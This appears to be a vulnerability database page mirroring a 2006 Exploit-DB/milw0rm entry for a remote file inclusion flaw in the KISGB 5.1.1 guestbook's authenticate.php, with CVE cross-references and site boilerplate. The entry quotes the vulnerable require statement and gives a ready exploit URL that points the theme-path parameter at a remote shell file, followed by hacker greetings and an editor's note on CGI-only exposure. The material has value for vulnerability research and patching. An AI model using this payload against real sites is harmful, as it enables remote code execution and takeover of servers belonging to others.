Lucene search
+L

KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion

🗓️ 22 Dec 2006 00:00:00Reported by mdxType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 33 Views

'Authenticate.php' Remote File Inclusion in KISGB 5.1.

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-1635
30 Mar 200800:00
circl
cve
CVE
CVE-2006-6763
27 Dec 200602:00
cve
cve
CVE
CVE-2006-6764
27 Dec 200602:00
cve
cve
CVE
CVE-2008-1635
2 Apr 200817:00
cve
cvelist
Cvelist
CVE-2006-6763
27 Dec 200602:00
cvelist
cvelist
Cvelist
CVE-2006-6764
27 Dec 200602:00
cvelist
cvelist
Cvelist
CVE-2008-1635
2 Apr 200817:00
cvelist
exploitdb
Exploit DB
KISGB (tmp_theme) 5.1.1 - Local File Inclusion
30 Mar 200800:00
exploitdb
euvd
EUVD
EUVD-2006-6746
7 Oct 202500:30
euvd
euvd
EUVD
EUVD-2006-6747
7 Oct 202500:30
euvd
Rows per page
******************************************************************************************************
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
******************************************************************************************************
*******************************************
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
*******************************************************************************************************************
+Author : mdx
*
*****************************************************************************
+Files :								    *
+authenticate.php?                                                          *
**********************************************************************************
+code  :                                                                         *
+                                                                                *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+                                                                                *
*********************************************************************************************
+ Exploit  :                                                                                *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt?   +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
==============================================================================================
?                  Hi , The_bat_hacker , How are you ? ;=)                                   *
?                                                                                            *
? Thanks ; Cyber-WARRIOR TIM USERS, xoron , prohack ,leak , ozii , sakkure , abbad, dreamlord*
?                                                                                            *
?/////////////////////////////////////////////////////////////////////////////////////////////
?---------------------specials thanks  stroke ,SHiKaA----------------------------------------*
**********************************************************************************************
*******************                                                                          *
*******************                   KORKULARINIZ SADECE KABUSLARINIZDIR..		     *
*******************                                                                          *
*******************                        Turkish Hacker by mdx                             *
*******************                                                                          *
*******************                        Korkmak Kurtulmak Degildir.			     *
*******************                                                                          *
**********************************************************************************************


//////////////////////////////////////////////////////////////////////////////////////////////


Notes:

$sapi_name = strtolower(php_sapi_name());
if (strpos($sapi_name,"cgi")===FALSE) {
}
else {
	Vulnerable here.

So this is only vulnerable for CGI PHP versions.

/str0ke

# milw0rm.com [2006-12-22]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Nov 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.0299
33